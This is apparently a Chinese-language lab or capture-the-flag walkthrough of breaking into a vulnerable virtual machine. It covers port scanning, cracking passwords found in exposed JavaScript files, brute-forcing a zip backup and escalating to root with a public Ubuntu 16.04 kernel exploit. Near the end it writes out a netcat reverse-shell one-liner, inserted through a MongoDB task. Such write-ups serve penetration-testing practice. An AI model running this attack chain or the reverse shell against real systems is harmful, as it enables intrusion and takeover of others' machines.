一、主机发现

arp-scan -l

得到靶机ip为192.168.55.152

二、端口扫描、目录枚举、漏洞扫描、指纹识别

2.1端口扫描

nmap --min-rate 10000 -p- 192.168.55.152

发现开放了3000端口，竟然没有开放80端口

扫描UDP端口

nmap -sU --min-rate 10000 -p- 192.168.55.152

发现不存在UDP端口

2.2目录枚举

dirb http://192.168.55.152:3000

没有其它信息，只能通过靶机网站进行信息收集了

2.3漏洞扫描

nmap --script=vuln -p22,3000 192.168.55.152

没有漏洞信息

2.4指纹识别

nmap 192.168.55.152 -sV -sC -O --version-all

三、进入靶机网页进行信息收集，拿到低权限shell

进入靶机页面进行信息收集

发现了登录框，尝试了SQL注入，发现不太行

只好看看网页的源代码了

发现这几个js代码的命令像提示

尝试打开看看，在这个js文件中找到了信息

继续拼接访问

找到了加密后的密码，去进行md5解密

尝试登陆tom用户

发现只有admin才能登陆，而刚刚的js文件都不是admin，只能继续寻找其它js文件

成功找到admin用户

破解密码即可

myP14ceAdm1nAcc0uNT
manchester

成功登陆，然后发现可以下载文件

使用cat命令查看后发现是base64编码后的文件，先进行解码

 cat myplace.backup | base64 -d >5.txt

发现这个文件是zip文件，解压需要密码

爆破压缩密码

fcrackzip -u -D -p rockyou.txt 5.zip 
命令解释：
-D 指定方式为字典猜解
-p 指定猜解字典的路径
-u 表示只显示破解出来的密码，其他错误的密码不显示出

成功爆破出来密码：magicword

查看一下app.js文件，成功找到mark用户账号密码

mark
5AYRft73VtFpc84k

成功登陆！

四、提权

4.1靶机信息收集

发现该用户没有sudo权限，没有定时任务，只好尝试在靶机内进行信息收集

4.2exp提权

尝试符合靶机版本的exp

searchsploit Ubuntu 16.04 privilege     # 搜索符合靶机版本的提权漏洞

经尝试发现44298.c可以

cd tmp
http://192.168.55.132/44298.c
gcc -o 44298 44298.c 
./44298

成功提权！

4.3登陆tom用户

刚刚获得mark账号密码时，发现是连接了Mongodb数据库，尝试使用markidentity进行登陆

mongo -u mark -p 5AYRft73VtFpc84k scheduler

show collections    #查看数据库中的集合（类似于mysql中的表）
db.tasks.find({})     #查询tasks中的所有文件

发现里面没有文档，我们可以尝试在其中插入文档进行反弹shell

db.tasks.insert({cmd: "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.55.132 8888 >/tmp/f"})

成功登陆tom用户